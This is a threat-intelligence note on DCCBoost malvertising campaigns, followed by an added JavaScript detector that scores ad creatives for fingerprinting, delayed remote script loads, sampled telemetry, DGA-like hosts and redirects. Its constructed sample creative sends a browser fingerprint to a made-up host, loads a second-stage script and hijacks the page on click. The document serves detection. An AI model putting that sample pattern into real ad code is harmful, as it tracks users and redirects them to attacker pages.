Over the past 3-4 weeks, Boltive has detected an increase in DCCBoost-related threat activity across all platforms. Boltive has observed DCCBoost run high-volume but short-term campaigns, typically lasting a few weeks. The campaign loads a very simple but deeply integrated loader, which in turn loads a second stage. The second stage then performs various fingerprinting, sends telemetry (only if its sampling criteria are met), performs ad-quality-vendor checks, and finally redirects the page if the targeting criteria are satisfied.
Techniques: fingerprinting, telemetry (1%, configurable), multistage loader, DGA and frequently rotating loader/payload/redirect domains, multiple delays, event-based triggers
Propagation: Creatopy/Adspeed/Bannerwise
Platforms: ALL
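The behaviours listed above (fingerprinting, sampled telemetry, a delayed second-stage load, an event-triggered redirect, DGA-looking hostnames) are exactly what a creative-scanning pipeline can look for before an ad is served. The following is an added example of such a static triage, not Boltive's detection code: the indicator regexes, the DGA heuristic (label length, Shannon entropy, digit/vowel mix) and the score thresholds are assumptions, and the two creative snippets are constructed samples, not captured DCCBoost payloads.

```javascript
// Added example: static triage of an ad creative's JavaScript for the DCCBoost-style
// behaviours described above. Patterns and thresholds are assumptions for illustration.

// Behavioural indicators. Each regex is a coarse proxy for one behaviour in the note.
const INDICATORS = [
  { name: 'fingerprinting',
    re: /navigator\.(userAgent|platform|language|hardwareConcurrency|plugins)|screen\.(width|height)|toDataURL\(/ },
  { name: 'delayed_execution',  re: /setTimeout\s*\(/ },
  { name: 'event_trigger',      re: /addEventListener\s*\(\s*['"](click|mousemove|touchstart|scroll)['"]/ },
  { name: 'remote_load',        re: /createElement\s*\(\s*['"]script['"]\s*\)|\.src\s*=/ },
  { name: 'redirect',           re: /(top|parent|window)\.location(\.href)?\s*=|location\.replace\(/ },
  // "if (Math.random() < 0.01)" style gating, i.e. the 1%/configurable telemetry sampling.
  { name: 'telemetry_sampling', re: /Math\.random\(\)\s*<\s*0?\.\d+/ },
];

// Shannon entropy in bits per character of a string.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Heuristic (assumed thresholds): the second-level label of a DGA domain tends to be
// long, high-entropy and either digit-heavy or vowel-poor. Real CDN/brand names are not.
function isDgaLike(host) {
  const labels = host.toLowerCase().split('.');
  const label = labels.length >= 2 ? labels[labels.length - 2] : labels[0];
  if (label.length < 10) return false;
  const digits = (label.match(/[0-9]/g) || []).length;
  const vowels = (label.match(/[aeiou]/g) || []).length;
  return shannonEntropy(label) >= 3.0 && (digits >= 2 || vowels / label.length < 0.2);
}

// Returns every hostname referenced by an http(s) URL literal in the source.
function extractHosts(src) {
  const urls = src.match(/https?:\/\/([a-z0-9.-]+)/gi) || [];
  return [...new Set(urls.map(u => u.replace(/^https?:\/\//i, '')))];
}

// Score a creative: one point per indicator, two per DGA-looking host (assumed weights).
function triage(src) {
  const indicators = INDICATORS.filter(i => i.re.test(src)).map(i => i.name);
  const hosts = extractHosts(src);
  const dgaHosts = hosts.filter(isDgaLike);
  const score = indicators.length + 2 * dgaHosts.length;
  const verdict = score >= 5 ? 'block' : score >= 3 ? 'review' : 'allow';
  return { indicators, hosts, dgaHosts, score, verdict };
}

// Constructed sample mimicking the loader chain in the note (not a real payload).
const SAMPLE_CREATIVE = `
(function () {
  var fp = [navigator.userAgent, navigator.language, screen.width + "x" + screen.height].join("|");
  if (Math.random() < 0.01) {
    new Image().src = "https://k3q9zt7pxw2v.net/t?fp=" + encodeURIComponent(fp);
  }
  setTimeout(function () {
    var s = document.createElement("script");
    s.src = "https://static.example-cdn.com/stage2.js";
    document.head.appendChild(s);
  }, 1500);
  document.addEventListener("click", function () {
    top.location.href = "https://k3q9zt7pxw2v.net/go";
  });
})();
`;

// Constructed benign creative: a click-to-open call to action and nothing else.
const BENIGN_CREATIVE = `
document.getElementById("cta").addEventListener("click", function () {
  window.open("https://www.example.com/landing");
});
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(SAMPLE_CREATIVE), null, 2));
  console.log(JSON.stringify(triage(BENIGN_CREATIVE), null, 2));
}
```

The sample creative trips all six indicators and the telemetry/redirect host is flagged as DGA-like, so it scores `block`; the benign creative only matches `event_trigger` and scores `allow`. Static regex triage is a first filter only: the second stage is fetched at run time from rotating domains, so a sandboxed render that records the actual script loads, timers and `location` writes is still needed to catch the redirect itself.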